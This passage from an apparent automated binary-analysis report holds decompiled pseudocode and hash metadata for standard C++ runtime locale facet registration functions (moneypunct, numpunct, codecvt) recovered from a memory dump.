																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t521);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6e286dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6E1C6FD3(__eflags, _t520);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6e286dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6E1C6FD3(__eflags, _t519);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6e286de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6E1C6FD3(__eflags, _t518);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6e286ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6E1C6FD3(__eflags, _t517);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6e286db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6E1C6FD3(__eflags, _t516);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6e286dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6E1C6FD3(__eflags, _t515);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6e286dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6E1C6FD3(__eflags, _t514);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6e286dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6E1C6FD3(__eflags, _t513);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6e286df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6E1C6FD3(__eflags, _t512);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6e286df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF56E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF578
int.LIBCPMT ref: 6E1CF58F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF5B2
std::_Facet_Register.LIBCPMT ref: 6E1CF5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF607

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 14d7bf3cb70cbafc130fa4d98c059cc8d6cfbe42680c5703d25c2d3c0a3e530b
Instruction ID: 5f531cba4c54a54ad4b06b08ad355e64a76451c48a0fb9a121d26e8475a6ab91
Opcode Fuzzy Hash: 14d7bf3cb70cbafc130fa4d98c059cc8d6cfbe42680c5703d25c2d3c0a3e530b
Instruction Fuzzy Hash: 071127B59105198BCF01DFE4C854AFEB37ABFA4B14F244508D520AB290DF789D84E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1CA2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t52 =  *0x6e286cd4;
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1A161C(0x6e286cc0);
				_t40 = _a8;
				_t22 = E6E1A171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1A1438(_t44);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e22ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t50);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e286cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA302
int.LIBCPMT ref: 6E1CA319

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

numpunct.LIBCPMT ref: 6E1CA33C
std::_Facet_Register.LIBCPMT ref: 6E1CA353
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA373
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA391

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: e80a8e9a9708dc4f030001061a3a8b064574f2d5eae27ac97ab0c338de466203
Instruction ID: 735cae5e3a60efc266a16dcbe2ab7a3f6c9004252164c8788c6eb04a0768748b
Opcode Fuzzy Hash: e80a8e9a9708dc4f030001061a3a8b064574f2d5eae27ac97ab0c338de466203
Instruction Fuzzy Hash: F611597591052C8FCF02DBE4C858AFEB77AAF65B14F140808E111E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CA059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t220 =  *0x6e286cd8;
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6E1A161C(0x6e286cc4);
				_t164 = _a8;
				_t78 = E6E1A171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CA96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t214, _t220, 0x14);
							E6E1C6653( &_v20, 0);
							_t221 =  *0x6e286cc8;
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6E1A161C(0x6e286b38);
							_t171 = _a8;
							_t215 = E6E1A171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CA9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t161, _t215, _t221, 0x14);
										E6E1C6653( &_v20, 0);
										_t222 =  *0x6e286ccc;
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6E1A161C(0x6e286cb8);
										_t178 = _a8;
										_t216 = E6E1A171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438( &_v32);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t161, _t216, _t222, 0x14);
													E6E1C6653( &_v20, 0);
													_t223 =  *0x6e286cd0;
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6E1A161C(0x6e286cbc);
													_t185 = _a8;
													_t217 = E6E1A171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6E1C66BA( &_v20);
														return E6E1E0075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E1CAAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438( &_v32);
																E6E1E3D74( &_v32, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t161, _t217, _t223, 0x14);
																E6E1C6653( &_v20, 0);
																_t224 =  *0x6e286cd4;
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6E1A161C(0x6e286cc0);
																_t192 = _a8;
																_t218 = E6E1A171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6E1C66BA( &_v20);
																	return E6E1E0075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6E1CAB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6E1A1438(_t196);
																			E6E1E3D74( &_v32, 0x6e283504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6e22ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6E1C6FD3(__eflags, _t218);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6e286cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6E1C6FD3(__eflags, _t217);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6e286cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t216);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6e286ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t215);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6e286cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t214);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6e286cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA060
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA06A
int.LIBCPMT ref: 6E1CA081

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1CA0A4
std::_Facet_Register.LIBCPMT ref: 6E1CA0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA0F9

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: ead4a29c686c5447863cd2df0064d3555cfe1901f1e7cb260466e144cd3305f8
Instruction ID: 9f3d7afc96278260b153884b24c126f4897c3fe65938d2a81a9c8dafa1618b13
Opcode Fuzzy Hash: ead4a29c686c5447863cd2df0064d3555cfe1901f1e7cb260466e144cd3305f8
Instruction Fuzzy Hash: B9112C7591052DCBCF02DBE4C858AFDB77ABF64B14F144808D511EB290DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF183, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF183(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;

				_t756 = __edx;
				_t575 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t814 - 0x14, 0);
				_t777 =  *0x6e286de8;
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6E1A161C(0x6e286d94);
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6E1C66BA(_t814 - 0x14);
					return E6E1E0075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6E1D0EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t814 - 0x20);
							E6E1E3D74(_t814 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t758, _t777, 0x14);
							E6E1C6653(_t814 - 0x14, 0);
							_t778 =  *0x6e286db8;
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6E1A161C(0x6e286d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6E1C66BA(_t814 - 0x14);
								return E6E1E0075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6E1D0F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t814 - 0x20);
										E6E1E3D74(_t814 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t575, _t759, _t778, 0x14);
										E6E1C6653(_t814 - 0x14, 0);
										_t779 =  *0x6e286dec;
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6E1A161C(0x6e286d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6E1C66BA(_t814 - 0x14);
											return E6E1E0075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6E1D0F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t814 - 0x20);
													E6E1E3D74(_t814 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t575, _t760, _t779, 0x14);
													E6E1C6653(_t814 - 0x14, 0);
													_t780 =  *0x6e286dbc;
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6E1A161C(0x6e286d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6E1C66BA(_t814 - 0x14);
														return E6E1E0075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6E1D0FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t814 - 0x20);
																E6E1E3D74(_t814 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t575, _t761, _t780, 0x14);
																E6E1C6653(_t814 - 0x14, 0);
																_t781 =  *0x6e286df0;
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6E1A161C(0x6e286d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6E1C66BA(_t814 - 0x14);
																	return E6E1E0075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6E1D1057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t814 - 0x20);
																			E6E1E3D74(_t814 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t575, _t762, _t781, 0x14);
																			E6E1C6653(_t814 - 0x14, 0);
																			_t782 =  *0x6e286dc0;
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6E1A161C(0x6e286d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6E1C66BA(_t814 - 0x14);
																				return E6E1E0075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6E1D10BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t814 - 0x20);
																						E6E1E3D74(_t814 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t575, _t763, _t782, 0x14);
																						E6E1C6653(_t814 - 0x14, 0);
																						_t783 =  *0x6e286df8;
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6E1A161C(0x6e286da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6E1C66BA(_t814 - 0x14);
																							return E6E1E0075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6E1D1127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t814 - 0x20);
																									E6E1E3D74(_t814 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t575, _t764, _t783, 0x14);
																									E6E1C6653(_t814 - 0x14, 0);
																									_t784 =  *0x6e286df4;
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6E1A161C(0x6e286da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6E1C66BA(_t814 - 0x14);
																										return E6E1E0075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6E1D11AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t814 - 0x20);
																												E6E1E3D74(_t814 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t575, _t765, _t784, 0x14);
																												E6E1C6653(_t814 - 0x14, 0);
																												_t785 =  *0x6e286dc8;
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6E1A161C(0x6e286d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6E1C66BA(_t814 - 0x14);
																													return E6E1E0075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6E1D1230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t814 - 0x20);
																															E6E1E3D74(_t814 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t575, _t766, _t785, 0x14);
																															E6E1C6653(_t814 - 0x14, 0);
																															_t786 =  *0x6e286dc4;
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6E1A161C(0x6e286d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6E1C66BA(_t814 - 0x14);
																																return E6E1E0075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6E1D12B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t814 - 0x20);
																																		E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t575, _t767, _t786, 0x14);
																																		E6E1C6653(_t814 - 0x14, 0);
																																		_t787 =  *0x6e286dd8;
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6E1A161C(0x6e286d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6E1C66BA(_t814 - 0x14);
																																			return E6E1E0075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6E1D1339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t814 - 0x20);
																																					E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t575, _t768, _t787, 0x14);
																																					E6E1C6653(_t814 - 0x14, 0);
																																					_t788 =  *0x6e286db0;
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6E1A161C(0x6e286d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6E1A171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6E1C66BA(_t814 - 0x14);
																																						return E6E1E0075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6E1D13A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t814 - 0x20);
																																								E6E1E3D74(_t814 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t575, _t769, _t788, 0x14);
																																								E6E1C6653(_t814 - 0x14, 0);
																																								_t789 =  *0x6e286ddc;
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6E1A161C(0x6e286d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
